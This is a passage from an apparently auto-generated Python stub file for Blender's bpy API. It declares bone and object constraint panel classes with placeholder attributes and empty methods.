def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bStretchToConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bTrackToConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bTransLikeConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bTransformCacheConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bTransformConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bActionConstraint_action(ConstraintButtonsSubPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bActionConstraint_target(ConstraintButtonsSubPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bArmatureConstraint_bones(ConstraintButtonsSubPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bSplineIKConstraint_chain_scaling(
ConstraintButtonsSubPanel, BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bSplineIKConstraint_fitting(ConstraintButtonsSubPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bTransformConstraint_from(ConstraintButtonsSubPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bTransformConstraint_to(ConstraintButtonsSubPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action_action(self, context):
'''
'''
pass
def draw_action_target(self, context):
'''
'''
pass
def draw_armature_bones(self, context):
'''
'''
pass
def draw_spline_ik_chain_scaling(self, context):
'''
'''
pass
def draw_spline_ik_fitting(self, context):
'''
'''
pass
def draw_transform_from(self, context):
'''
'''
pass
def draw_transform_to(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bActionConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
